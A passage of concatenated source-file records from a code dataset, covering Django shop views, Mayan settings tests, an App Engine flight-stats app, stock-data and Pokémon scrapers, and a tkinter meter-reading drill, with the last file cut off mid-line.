pass\n bestprols.append(dict(classtwo=classtwo, name=pname, path=path))\n bestls.append(dict(name = name, bestprols= bestprols))\n return render_to_response('gree_products.html', {\"classls\":classls, 'bestls':bestls})\n\ndef getProducts(requrst):\n classone = requrst.POST.get('classone', '')\n classtwo = requrst.POST.get('classtwo', '')\n productname = requrst.POST.get('productname', '')\n\n if classone != '' and classtwo == '' and productname == '':\n products = []\n classoneobj = ClassOne.objects.get(ClassName = classone)\n classtwoobj = ClassTwo.objects.get(PreClass = classoneobj, Sequence = 0)\n productobjls = Products.objects.filter(ClassOne = classoneobj, ClassTwo = classtwoobj).order_by('Sequence')\n for productobj in productobjls:\n path = ''\n try:\n productpicobj = ProductPic.objects.get(Product = productobj, Sequence = 0)\n path = productpicobj.Picture.url\n except Exception:\n pass\n products.append(dict(picsrc = path, productname = productobj.ProductName))\n jsonObject = json.dumps({'products':products},ensure_ascii = False)\n #加上ensure_ascii = False,就可以保持utf8的编码,不会被转成unicode\n return HttpResponse(jsonObject,content_type=\"application/json\")\n elif classone != '' and classtwo != '' and productname == '':\n products = []\n classoneobj = ClassOne.objects.get(ClassName = classone)\n classtwoobj = ClassTwo.objects.get(PreClass = classoneobj, ClassName = classtwo)\n productobjls = Products.objects.filter(ClassOne = classoneobj, ClassTwo = classtwoobj).order_by('Sequence')\n for productobj in productobjls:\n path = ''\n try:\n productpicobj = ProductPic.objects.get(Product = productobj, Sequence = 0)\n path = productpicobj.Picture.url\n except Exception:\n pass\n products.append(dict(picsrc = path, productname = productobj.ProductName))\n jsonObject = json.dumps({'products':products},ensure_ascii = False)\n #加上ensure_ascii = False,就可以保持utf8的编码,不会被转成unicode\n return HttpResponse(jsonObject,content_type=\"application/json\")\n elif classone != '' and classtwo != '' and productname != '':\n classoneobj = ClassOne.objects.get(ClassName = classone)\n classtwoobj = ClassTwo.objects.get(PreClass = classoneobj, ClassName = classtwo)\n productobj = Products.objects.get(ClassOne = classoneobj, ClassTwo = classtwoobj, ProductName = productname)\n picsrc = []\n productpicobjls = ProductPic.objects.filter(Product = productobj).order_by('Sequence')\n for productpicobj in productpicobjls:\n path = productpicobj.Picture.url\n picsrc.append(path)\n jsonObject = json.dumps({'picsrc':picsrc, 'table':productobj.ProductInfo, 'content':productobj.ProductInfoContent},ensure_ascii = False)\n #加上ensure_ascii = False,就可以保持utf8的编码,不会被转成unicode\n return HttpResponse(jsonObject,content_type=\"application/json\")\n else:\n return HttpResponse('请求有错。请刷新页面。')\n\ndef news(requrst):\n newsobjls = News.objects.all()[0:10]\n newscount = len(News.objects.all())\n newsls = []\n for newsobj in newsobjls:\n date = str(newsobj.CreateDate)\n datels = date.split('-')\n D = datels[2]\n YM = datels[0] + ' ' + datels[1]\n newsls.append(dict(D = D, YM = YM, Title = newsobj.Title, ShortContent = newsobj.ShortContent))\n return render_to_response('gree_news.html', {'newscount':newscount, 'newsls':newsls})\n\ndef getNews(requrst):\n name = requrst.POST['title']\n newsobj = News.objects.get(Title = name)\n jsonObject = json.dumps({'content':newsobj.LongContent},ensure_ascii = False)\n #加上ensure_ascii = False,就可以保持utf8的编码,不会被转成unicode\n return HttpResponse(jsonObject,content_type=\"application/json\")\n\ndef moreNews(requrst):\n page = requrst.POST['page']\n i = int(page)\n newsobjls = News.objects.all()[10 * (i - 1 ) : 10 * i]\n newsls = []\n for newsobj in newsobjls:\n date = str(newsobj.CreateDate)\n datels = date.split('-')\n D = datels[2]\n YM = datels[0] + ' ' + datels[1]\n newsls.append(dict(D = D, YM = YM, Title = newsobj.Title, ShortContent = newsobj.ShortContent))\n t = get_template('more_news.html')\n c = Context({'newsls':newsls})\n html = t.render(c)\n jsonObject = json.dumps({'html':html},ensure_ascii = False)\n #加上ensure_ascii = False,就可以保持utf8的编码,不会被转成unicode\n return HttpResponse(jsonObject,content_type=\"application/json\")\n\ndef shop(requrst):\n shopobjls = Shop.objects.all().order_by('Sequence')\n shopls = []\n for shopobj in shopobjls:\n path = ''\n try:\n picobj = ShopFirstPic.objects.get(Shop = shopobj)\n path = picobj.Picture.url\n except ShopFirstPic.DoesNotExist:\n pass\n shopls.append(dict(Title = shopobj.Title, path = path))\n return render_to_response('gree_stores.html', {'shopls':shopls})\n\ndef getStore(requrst):\n name = requrst.POST['storename']\n shopobj = Shop.objects.get(Title = name)\n jsonObject = json.dumps({'content':shopobj.Content},ensure_ascii = False)\n #加上ensure_ascii = False,就可以保持utf8的编码,不会被转成unicode\n return HttpResponse(jsonObject,content_type=\"application/json\")\n\ndef case(requrst):\n caseobjls = Case.objects.all().order_by('Sequence')\n casels = []\n for caseobj in caseobjls:\n path = ''\n try:\n picobj = CaseFirstPic.objects.get(Case = caseobj)\n path = picobj.url\n except CaseFirstPic.DoesNotExist:\n pass\n casels.append(dict(Title = caseobj.Title, path = path))\n return render_to_response('gree_engineering.html', {'casels':casels})\n\ndef getEngineer(requrst):\n name = requrst.POST['engineername']\n caseobj = Case.objects.get(Title = name)\n jsonObject = json.dumps({'content':caseobj.Content},ensure_ascii = False)\n #加上ensure_ascii = False,就可以保持utf8的编码,不会被转成unicode\n return HttpResponse(jsonObject,content_type=\"application/json\")\n\ndef job(requrst):\n jobobjls = Job.objects.all()\n return render_to_response('gree_recruitment.html', {'jobls':jobobjls})\n\ndef culture(requrst):\n honorpicobjls = HonorPic.objects.all()\n picpathls = []\n for honorpicobj in honorpicobjls:\n picpathls.append(honorpicobj.Picture.url)\n return render_to_response('gree_culture.html', {'companyinfo':Culture.objects.get(Part = 'companyinfo').Content,\n 'greemind':Culture.objects.get(Part = 'greemind').Content,\n 'leaderword':Culture.objects.get(Part = 'leaderword').Content,\n 'picpathls':picpathls})\n\ndef contact(requrst):\n contactusobj = ContactUs.objects.all()[0]\n return render_to_response('gree_contact.html', {'content':contactusobj.Content})\n\n\n\n\n","sub_path":"gree/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"541002181","text":"from __future__ import unicode_literals\n\nimport importlib\nimport logging\n\nfrom mayan.apps.common.tests.base import BaseTestCase\nfrom mayan.apps.documents import storages\nfrom mayan.apps.documents.settings import (\n setting_documentimagecache_storage_arguments,\n setting_storage_backend_arguments\n)\nfrom mayan.apps.smart_settings.tests.mixins import SmartSettingTestMixin\n\nfrom ..settings import setting_language_codes\n\n\nclass DocumentSettingsTestCase(SmartSettingTestMixin, BaseTestCase):\n def test_documents_language_codes_setting_double_quotes(self):\n self._set_environment_variable(\n name='MAYAN_{}'.format(setting_language_codes.global_name),\n value='[\"spa\",\"fra\"]'\n )\n\n self.assertEqual(\n setting_language_codes.value,\n ['spa', 'fra']\n )\n\n def test_documents_language_codes_setting_single_quotes(self):\n self._set_environment_variable(\n name='MAYAN_{}'.format(setting_language_codes.global_name),\n value=\"['spa','deu']\"\n )\n\n self.assertEqual(\n setting_language_codes.value,\n ['spa', 'deu']\n )\n\n\nclass DocumentStorageSettingsTestCase(SmartSettingTestMixin, BaseTestCase):\n def test_setting_documentimagecache_storage_arguments_invalid_value(self):\n self._set_environment_variable(\n name='MAYAN_{}'.format(\n setting_documentimagecache_storage_arguments.global_name\n ), value=\"invalid_value\"\n )\n self.test_case_silenced_logger_new_level = logging.FATAL + 10\n\n self._silence_logger(name='mayan.apps.documents.storages')\n\n with self.assertRaises(TypeError) as assertion:\n importlib.reload(storages)\n\n self.assertTrue('Unable to initialize' in str(assertion.exception))\n\n def test_setting_storage_backend_arguments_invalid_value(self):\n self._set_environment_variable(\n name='MAYAN_{}'.format(\n setting_storage_backend_arguments.global_name\n ), value=\"invalid_value\"\n )\n self.test_case_silenced_logger_new_level = logging.FATAL + 10\n\n self._silence_logger(name='mayan.apps.documents.storages')\n\n with self.assertRaises(TypeError) as assertion:\n importlib.reload(storages)\n\n self.assertTrue('Unable to initialize' in str(assertion.exception))\n","sub_path":"mayan/apps/documents/tests/test_settings.py","file_name":"test_settings.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"129208689","text":"#!/usr/bin/env python\n#\n# AHOSCH\n# UW PYTHON COURSE WEEK 10\n# Database List\n# Can be found at http://ahosch-ontime.appspot.com/\n\"\"\"attempts to create, query, and update a google database\"\"\"\n\n\nfrom google.appengine.ext import db\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext.webapp import util\n\nclass Airline(db.Model):\n airlineName = db.StringProperty(required=True)\n airlineCode = db.StringProperty(required=True)\n\n\nclass OntimeStats(db.Model):\n airlineCode = db.StringProperty(required=True)\n departureCity = db.StringProperty(required=True)\n arrivalCity = db.StringProperty(required=True)\n totalFlights = db.IntegerProperty(default=0)\n cancelledFlights = db.IntegerProperty(default=0)\n divertedFlights = db.IntegerProperty(default=0)\n delayLength = db.ListProperty(int)\n\n def addFlight(self,flightCount=1,delay=0,cancelled=0,diverted=0):\n self.totalFlights = self.totalFlights + flightCount\n self.cancelledFlights = self.cancelledFlights + cancelled\n self.divertedFlights = self.divertedFlights + diverted\n self.delayLength.append(delay)\n self.put()\n\n def delayAverage(self):\n return int(sum(self.delayLength)/len(self.delayLength))\n\n def delayMax(self):\n return max(self.delayLength)\n\n def ontime(self):\n ontime = 0\n for flight in self.delayLength:\n if flight <= 5:\n ontime += 1\n return int('%.0f' % (float(ontime/float(self.totalFlights))*100))\n\n\nclass MainHandler(webapp.RequestHandler):\n def get(self):\n\n ####\"\"\" data generation hardcoded start\"\"\"\n s = Airline(airlineName='Singapore Airlines',airlineCode='SQ')\n s.put()\n ####\"\"\" data generation hardcoded end\"\"\"\n \n q=db.GqlQuery('SELECT * from Airline')\n results = q.fetch(1)\n for p in results:\n self.response.out.write('

    ' \\\n +p.airlineName+ \\\n '

    ')\n self.response.out.write('

    '+p.airlineName+'

    ')\n self.response.out.write('')\n\nclass ontimeHandler(webapp.RequestHandler):\n def get(self,airlineCode):\n\n ####\"\"\" data generation hardcoded start\"\"\"\n y = OntimeStats(airlineCode ='SQ',\n departureCity ='here',\n arrivalCity ='there',\n totalFlights =1)\n db.run_in_transaction(y.addFlight)\n y.put()\n ####\"\"\" data generation hardcoded end\"\"\"\n\n p = OntimeStats.all()\n\n results = p.fetch(100)\n for x in results:\n self.response.out.write('

    FROM: '+x.departureCity+' TO: '+x.arrivalCity+'

    ')\n self.response.out.write('

    ON TIME PERCENT: '+str(x.ontime())+'

    ')\n self.response.out.write('

    TOTAL FLIGHTS: '+str(x.totalFlights)+'

    ')\n self.response.out.write('

    DELAY AVERAGE: '+str(x.delayAverage())+'

    ')\n self.response.out.write('

    MAX DELAY: '+str(x.delayMax())+'

    ')\n \n self.response.out.write('')\n\n for x in results:\n db.delete(x)\n\n\ndef main():\n application = webapp.WSGIApplication([('/', MainHandler),\n (r'/airline/(.*)', ontimeHandler),\n ],\n debug=True)\n util.run_wsgi_app(application)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"week9_assignment/ontime/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"343651616","text":"# coding:utf-8\n\nimport json\nimport os\n\nfrom pytdx.reader import TdxMinBarReader\n\nfrom SuperQuant.SQUtil import (SQ_util_date_stamp, SQ_util_log_info,\n SQ_util_time_stamp)\nfrom SuperQuant.SQSetting.SQSetting import DATABASE\n\n\ndef SQ_save_tdx_to_mongo(file_dir, client=DATABASE):\n \"\"\"save file\n\n Arguments:\n file_dir {str:direction} -- 文件的地址\n\n Keyword Arguments:\n client {Mongodb:Connection} -- Mongo Connection (default: {DATABASE})\n \"\"\"\n\n reader = TdxMinBarReader()\n __coll = client.stock_min_five\n for a, v, files in os.walk(file_dir):\n\n for file in files:\n\n if (str(file)[0:2] == 'sh' and int(str(file)[2]) == 6) or \\\n (str(file)[0:2] == 'sz' and int(str(file)[2]) == 0) or \\\n (str(file)[0:2] == 'sz' and int(str(file)[2]) == 3):\n SQ_util_log_info('Now_saving ' + str(file)\n [2:8] + '\\'s 5 min tick')\n fname = file_dir + os.sep + file\n df = reader.get_df(fname)\n df['code'] = str(file)[2:8]\n df['market'] = str(file)[0:2]\n df['datetime'] = [str(x) for x in list(df.index)]\n df['date'] = [str(x)[0:10] for x in list(df.index)]\n df['time_stamp'] = df['datetime'].apply(\n lambda x: SQ_util_time_stamp(x))\n df['date_stamp'] = df['date'].apply(\n lambda x: SQ_util_date_stamp(x))\n data_json = json.loads(df.to_json(orient='records'))\n __coll.insert_many(data_json)\n\n\nif __name__ == '__main__':\n file_dir = ['C:\\\\users\\\\yutiansut\\\\desktop\\\\sh5fz',\n 'C:\\\\users\\\\yutiansut\\\\desktop\\\\sz5fz']\n for item in file_dir:\n SQ_save_tdx_to_mongo(item)\n\n","sub_path":"SuperQuant_FrameWork/SuperQuant留存本/SQSU/deleted/save_tdx_file.py","file_name":"save_tdx_file.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"519411644","text":"\n\nfrom xai.brain.wordbase.adverbs._up import _UP\n\n#calss header\nclass _UPPING(_UP, ):\n\tdef __init__(self,): \n\t\t_UP.__init__(self)\n\t\tself.name = \"UPPING\"\n\t\tself.specie = 'adverbs'\n\t\tself.basic = \"up\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/adverbs/_upping.py","file_name":"_upping.py","file_ext":"py","file_size_in_byte":220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"92118547","text":"from lxml import etree\nfrom prettytable import PrettyTable\n\ntree = etree.parse(\"formal-tst.NE.key.04oct95_sample.txt.se.xml\")\ntotal_length = 0\ndictio = {}\nalready = {}\nverify = 0.0\n\nfor entity in tree.xpath(\"/specific_entities/specific_entity\"):\n\ttotal_length += 1\n\n\nt = PrettyTable(['Entité nommée', 'Type', 'Nombre d\\'occurence', 'Proportion dans le texte'])\n\n#Remplir un premier dictionnaire afin d'avoir le nombre d'occurence correspondant à chaque mot.\nfor entity in tree.xpath(\"/specific_entities/specific_entity\"):\n\tif entity[0].text not in dictio:\n\t\tdictio[entity[0].text] = 1\n\t\t\n\telse:\n\t\tdictio[entity[0].text] += 1\n\n#le deuxieme dictionnaire sert à ne pas afficher \nfor entity in tree.xpath(\"/specific_entities/specific_entity\"):\n\tif entity[0].text not in already:\n\t\talready[entity[0].text] = 1\n\t\tt.add_row([entity[0].text, entity[3].text, dictio[entity[0].text], ((dictio[entity[0].text]/total_length)*100)])\n\t\t\n\nprint(t)","sub_path":"src/ii_iii/ii_2_script_extraction.py","file_name":"ii_2_script_extraction.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"157427109","text":"import datetime\nfrom collections import namedtuple\nfrom time import sleep\n\n#テスト結果\nTestReport = namedtuple(\"TestReport\", \n ( \"episode\", \n \"steps\",\n \"median_total_reward\",\n \"worst_total_reward\",\n \"training_TD_error\", \n \"test_TD_error\" )\n )\n\n\n#テスト結果のログを画面に出力する\nclass DisplayTestLog:\n def __int__(self):\n pass\n #def\n\n def print(self, data):\n print( \"episode:\" +str(data.episode)\n +\", steps:\" +str(data.steps)\n +\", median_toal_reward:{:.2f}\".format(data.median_total_reward)\n +\", worst_toal_reward:{:.2f}\".format(data.worst_total_reward)\n )\n #def\n#class\n\n\n#テスト結果のログをファイルに残す\nclass FileTestLog:\n def __init__(self, filename):\n self._retry = 0.1\n self._filename = filename\n\n with open(self._filename, \"a\") as file:\n file.write(\"#episode, steps, median_total_rewad, worst_total_rewad, training squared_TD_error, test squared_TD_error \\n\")\n #with\n #def\n\n def print(self, data):\n while True:\n #ファイルのアクセス権が取れるまでリトライ\n try:\n with open(self._filename, \"a\") as file:\n data_list = list(map(lambda value: str(value) , data))\n time_stamp = datetime.datetime.now()\n\n file.write(','.join(data_list)+\",\" +str(time_stamp) +\"\\n\")\n #with\n #書き込みに成功したら抜ける\n break\n\n except Exception:\n #アクセス権が取れなかったらリトライ\n sleep(self._retry)\n continue\n #try-except\n #while\n\n return\n #def\n#class\n\n\n#各種のテストログを残す\nclass TestLogs:\n def __init__(self, logs):\n self._logs = logs\n #def\n\n def print(self, data):\n for log in self._logs:\n log.print(data)\n #for\n return\n #def\n#class\n","sub_path":"dqn/test_log.py","file_name":"test_log.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"414065672","text":"#Author:Chris.chen\n# import queue\nimport multiprocessing\nimport threading\n\ndef f(qq):\n qq.put([42,None,'hello'])\n\nif __name__ == '__main__':\n # q = queue.Queue()\n # p = threading.Thread(target=f,)\n q = multiprocessing.Queue()\n p = multiprocessing.Process(target=f,args=(q,))\n p.start()\n print(q.get())\n","sub_path":"day10/进程queue.py","file_name":"进程queue.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"411872103","text":"import unittest\nimport vcr\n\nfrom pytest import fixture\nfrom trywrapper import TV\n\n\n@fixture\ndef tv_keys():\n \"\"\"Responsible only for returning the test data\"\"\"\n return [\n 'id', 'origin_country', 'poster_path', 'name', 'overview',\n 'popularity', 'backdrop_path', 'first_air_date', 'vote_count',\n 'vote_average'\n ]\n\n\n@vcr.use_cassette('tests/vcr_cassettes/tv-info.yml',\n filter_query_parameters=['api_key'])\ndef test_tv_info(tv_keys):\n \"\"\"tests an API to get a TV show's info\"\"\"\n\n tv_instance = TV(1396)\n response = tv_instance.info()\n\n assert isinstance(response, dict)\n assert response[\"id\"] == 1396\n assert set(tv_keys).issubset(response.keys())\n\n\n@vcr.use_cassette('tests.vcr_cassettes/tv-popular.yml',\n filter_query_parameters=['api_key'])\ndef test_tv_popularity():\n \"\"\"Tests an API call to get popular tv shows\"\"\"\n\n response = TV.popular()\n\n assert isinstance(response, dict)\n assert isinstance(response['results'], list)\n assert set(tv_keys()).issubset(response['results'][0].keys())\n","sub_path":"tests/test_trywrapper.py","file_name":"test_trywrapper.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"81640570","text":"import tkinter as tk\r\nimport math\r\n#from PIL import Image,ImageTK,ImageSequence\r\nmain_window=tk.Tk()\r\n#main_window.attributes(\"-alpha\",1.0)\r\ncanvas = tk.Canvas(main_window, bg='skyblue', width=800,height=200)\r\nOx=40\r\nOy=40\r\nrad=72\r\n\r\ndef circle_ptr():\r\n for c in range(5):\r\n p = c*rad*2\r\n for i in range(10):\r\n di=18\r\n x=Ox+rad\r\n y=Oy+rad\r\n dotsize=2\r\n radi=math.radians(0+di+(i*36))\r\n rcos=rad*math.cos(radi)\r\n rsin=rad*math.sin(radi)\r\n cir_ptr= canvas.create_oval(p+x+rcos-dotsize,y+rsin-dotsize,p+x+rcos+dotsize,y+rsin+dotsize,fill='black')\r\n\r\n\r\ndef circle_num(font_type):\r\n font_size ,num_position = int(rad/3.6) ,int(rad/4.8)\r\n di,x,y = 270,Ox+rad,Oy+rad\r\n for c in range(5):\r\n p = c*rad*2\r\n for i in range(10):\r\n radi=math.radians(0+di+(i*36))\r\n if c==1 or c==3:\r\n radi=math.radians(0+di-(i*36))\r\n rcos=(rad-num_position)*math.cos(radi)\r\n rsin=(rad-num_position)*math.sin(radi)\r\n cir_num= canvas.create_text(p+x+rcos,y+rsin,text=str(i),font=(font_type,font_size))\r\n\r\ndef circle_frame(x,y):\r\n for i in range(5):\r\n p= i*rad*2\r\n cir1 = canvas.create_oval(x+p,y,x+p+rad*2,y+rad*2,fill='silver')\r\n cir1 = canvas.create_oval(x+p+1,y+1,x+p+rad*2-1,y+rad*2-1,fill='silver')\r\n\r\n\r\ndef central_dot(Ox,Oy,color):\r\n dot_size=int(rad/24)\r\n cir_size = int(rad/4.8)\r\n x=Ox+rad\r\n y=Oy+rad\r\n for i in range(5):\r\n p = i*rad*2\r\n cir = canvas.create_oval(x-cir_size+p,y-cir_size,x+cir_size+p,y+cir_size,fill='black')\r\n cen = canvas.create_oval(x-dot_size+p,y-dot_size,x+dot_size+p,y+dot_size,fill=color)\r\n #central_dot(Ox,Oy,\"white\")#for temp use\r\n canvas.pack()\r\n\r\n\r\ndef initial():\r\n main_window.title(\"台灣電力公司 TAI POWER\")\r\n main_window.geometry('800x300')\r\n label = tk.Label(main_window,text=\"抄 表 練 習 程 式 Beta3\",bg = 'yellow',font=('Arial Black',15)).place(x=0,y=0)\r\n #label = canvas.create_text(180,20,text=\"抄 表 練 習 程 式 Beta3\",font=('Arial Black',20))\r\n circle_frame(Ox,Oy)\r\n central_dot(Ox,Oy,\"white\")\r\n circle_ptr()\r\n circle_num('Arial Black')\r\n #circle_num('Bahnschrift SemiBold')\r\n \r\n\r\n \r\n\r\n\r\ninitial()\r\n\r\n\r\nangle=[20,40,60,80,100]\r\ndef pointer():\r\n a=10\r\n \r\ndi=0\r\ni=120\r\np=1*rad*2\r\nx=Ox+rad\r\ny=Oy+rad\r\np_size= int(rad/4.8) # pointer width size\r\npp_size = int(rad/36) # pointer tail width size\r\ndotsize=3 # temply use\r\n\r\nradi=math.radians(0+di+(i))\r\nright=math.radians(0+di+(i)+90)\r\nleft=math.radians(0+di+(i)-90)\r\n\r\nv_rcos=(rad-4)*math.cos(radi)\r\nv_rsin=(rad-4)*math.sin(radi)\r\n#cir_ptr= canvas.create_oval(p+x-dotsize,y-dotsize,p+x+dotsize,y+dotsize,fill='green')\r\nr_rcos=p_size*math.cos(right)\r\nr_rsin=p_size*math.sin(right)\r\n#right_ptr= canvas.create_oval(p+x+r_rcos-dotsize,y+r_rsin-dotsize,p+x+r_rcos+dotsize,y+r_rsin+dotsize,fill='gold')\r\nl_rcos=p_size*math.cos(left)\r\nl_rsin=p_size*math.sin(left)\r\n#left_ptr= canvas.create_oval(p+x+l_rcos-dotsize,y+l_rsin-dotsize,p+x+l_rcos+dotsize,y+l_rsin+dotsize,fill='gold')\r\nrcos=rad*math.cos(radi)\r\nrsin=rad*math.sin(radi)\r\n#cir_ptr= canvas.create_oval(p+x+v_rcos-dotsize,y+v_rsin-dotsize,p+x+v_rcos+dotsize,y+v_rsin+dotsize,fill='red')\r\n\r\n\r\nx1=p+x+v_rcos\r\ny1= y+v_rsin\r\nx2=p+x+v_rcos\r\ny2= y+v_rsin\r\n\r\nRR_rcos=pp_size*math.cos(right)\r\nRR_rsin=pp_size*math.sin(right)\r\n#cir_ptr= canvas.create_oval(x1+RR_rcos-2,y1+RR_rsin-2,x2+RR_rcos+2,y2+RR_rsin+2,fill='blue')\r\n\r\nRL_rcos=pp_size*math.cos(left)\r\nRL_rsin=pp_size*math.sin(left)\r\n#cir_ptr= canvas.create_oval(x1+RL_rcos-2,y1+RL_rsin-2,x2+RL_rcos+2,y2+RL_rsin+2,fill='white')\r\n\r\npoints = [ x1+RL_rcos,y1+RL_rsin , x1+RR_rcos,y1+RR_rsin , p+x+r_rcos,y+r_rsin , p+x+l_rcos,y+l_rsin ]\r\ntriangle = canvas.create_polygon(points,fill='black')\r\ncentral_dot(Ox,Oy,\"white\")#for temp use\r\n\r\n\r\n\r\nlabel_var = tk.StringVar()\r\nlabel_var.set(\"test\")\r\ntest_String = tk.Label(main_window,textvariable = label_var, bg='yellow')\r\ntest_String.place(x=350,y=220)\r\n\r\ndef clickOK():\r\n label_var.set(index.get())\r\n #circle_frame(Ox,Oy)\r\n #central_dot(Ox,Oy,int(index.get()))\r\n \r\nbutton = tk.Button(main_window,text=\"ENTER\",command=clickOK)\r\n\r\nindex = tk.Entry(main_window,width=5)\r\nindex.place(x=350,y=240)\r\nbutton.place(x=350,y=260)\r\n\r\n\r\n\r\n\r\nmain_window.resizable(0,0)\r\nmain_window.mainloop()\r\n\r\n\r\n#frame=tk.PhotoImage(file='R:/12345.png')\r\n#ptr_1=tk.PhotoImage(file='R:/pointer.png')\r\n#label_f=tk.Label(main_window,image=frame)\r\n#label_f.frame=frame\r\n#label_f.place(x=10,y=30) \r\n#label_p1 = tk.Label(main_window,image=ptr_1)\r\n#label_p1.frame=ptr_1\r\n#label_p1.place(x=78,y=70)\r\n","sub_path":"抄表練習程式Beta3.py","file_name":"抄表練習程式Beta3.py","file_ext":"py","file_size_in_byte":4704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"549249420","text":"# -*- coding: UTF-8 -*-\n# -----------------------------------------------------------------------------\n#\n# P A G E B O T\n#\n# Copyright (c) 2016+ Buro Petr van Blokland + Claudia Mens & Font Bureau\n# www.pagebot.io\n# Licensed under MIT conditions\n# Made for usage in DrawBot, www.drawbot.com\n# -----------------------------------------------------------------------------\n#\n# oval.py\n#\nfrom __future__ import division # Make integer division result in float.\nfrom drawBot import oval\n\nfrom pagebot import setStrokeColor, setFillColor\nfrom pagebot.style import NO_COLOR\nfrom pagebot.elements.element import Element\nfrom pagebot.toolbox.transformer import pointOffset\n\nclass Oval(Element):\n\n def draw(self, origin, view):\n\n p = pointOffset(self.oPoint, origin)\n p = self._applyScale(p) \n px, py, _ = p = self._applyAlignment(p) # Ignore z-axis for now.\n \n self.drawFrame(p, view) # Draw optional frame or borders.\n \n if self.drawBefore is not None: # Call if defined\n self.drawBefore(self, p, view)\n\n setFillColor(self.css('fill', NO_COLOR))\n setStrokeColor(self.css('stroke', NO_COLOR), self.css('strokeWidth'))\n oval(px, py, self.w, self.h)\n\n # If there are child elements, draw them over the text.\n self._drawElements(p, view)\n\n if self.drawAfter is not None: # Call if defined\n self.drawAfter(self, p, view)\n\n self._restoreScale()\n view.drawElementMetaInfo(self, origin)\n","sub_path":"Lib/pagebot/elements/pboval.py","file_name":"pboval.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"400507119","text":"DAYS_OF_WEEK = ['Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday' ]\nD30_MONTHS = [4, 6, 9, 11]\nD31_MONTHS = [1, 3, 5, 7, 8, 10, 12]\n\nclass State(object):\n def __init__(self, s_day, s_month, s_year, day_of_week):\n self.nb_days = 1\n self.nb_sundays_first_of_month = 0\n self.day_of_week = day_of_week\n self.c_day = s_day\n self.c_month = s_month\n self.c_year = s_year\n\n def step_until(self, e_day, e_month, e_year):\n while True:\n self.step_one_day()\n if self.is_sunday_first_of_month():\n self.nb_sundays_first_of_month += 1\n print(\"{0}: {1}/{2}/{3}\".format(self.nb_sundays_first_of_month, self.c_day, self.c_month, self.c_year))\n #print(\"{0}/{1}/{2}\".format(self.c_day, self.c_month, self.c_year))\n if (self.c_day == e_day\n and self.c_month == e_month\n and self.c_year == e_year):\n break\n\n def step_one_day(self):\n self.nb_days += 1\n self.day_of_week = (self.day_of_week + 1) % 7\n self.c_day += 1\n\n if self.c_day > nb_days_in_month(self.c_month, self.c_year):\n self.c_day = 1\n self.c_month += 1\n\n if self.c_month == 13:\n self.c_month = 1\n self.c_year += 1\n\n def is_sunday_first_of_month(self):\n if self.day_of_week == 0 and self.c_day == 1:\n #print(\"+1\")\n return True\n else:\n return False\n\ndef nb_days_in_month(month, year):\n if month in D30_MONTHS:\n return 30\n elif month in D31_MONTHS:\n return 31\n else:\n if is_leap_year(year):\n return 29\n else:\n return 28\n\ndef is_leap_year(year):\n if year % 100 == 0:\n if year % 400 == 0:\n return True\n else:\n return False\n elif year % 4 == 0:\n return True\n else:\n return False\n\n\ndef task19():\n c = 0\n for year in range(1901, 2001):\n for month in range(1, 13):\n c += datetime.datetime(year,month, 1).weekday()==6\n return c\n\n\nif __name__ == '__main__':\n s = State(1, 1, 1901, 2)\n s.step_until(31, 12, 2000)\n #s.step_until(31, 1, 1901)\n print(s.nb_sundays_first_of_month)\n","sub_path":"Python/p19.py","file_name":"p19.py","file_ext":"py","file_size_in_byte":2293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"102983220","text":"# -*- coding: latin-1 -*-\n\nimport math\nimport re\nimport requests\nimport time\nfrom lxml import html\n\nfrom forms import Stat, AddedPokes, FormConfig\nfrom parser import Parser\nfrom substitution import attack_substitution, ability_substitution, type_substitution\nfrom util import namesies, remove_prefix, remove_empty, index_swap, get_types, normalize_form, replace_special, dashy\n\n\ndef get_base_exp_map():\n page = requests.get('https://bulbapedia.bulbagarden.net/wiki/List_of_Pok%C3%A9mon_by_effort_value_yield')\n tree = html.fromstring(page.text)\n\n table = tree.xpath('//*[@id=\"mw-content-text\"]/table[1]/tr')\n base_exp_map = {}\n for i, row in enumerate(table):\n # Schema\n if i == 0:\n continue\n\n num = row[0].text_content().strip()\n base_exp = int(row[3].text_content().replace(\"*\", \"\").strip())\n\n # First one is likely the base form\n if num in base_exp_map:\n continue\n\n base_exp_map[num] = base_exp\n\n # Meltan/Melmetal aren't in this page yet\n base_exp_map['808'] = 135\n base_exp_map['809'] = 270\n\n return base_exp_map\n\n\nwith open(\"../temp.txt\", \"w\") as f:\n start_time = time.time()\n\n base_exp_map = get_base_exp_map()\n for num in range(1, list(AddedPokes)[-1].value + 1):\n# for num in [1]:\n form_config = FormConfig(num)\n parser = Parser(form_config.lookup_num)\n\n info_index = 2\n if form_config.is_mega:\n # First row is Mega Evolution title\n info_index += 1\n assert parser.update_table(form_config.mega_name)\n\n # Picture, Name, Other Names, No., Gender Ratio, Type\n row = 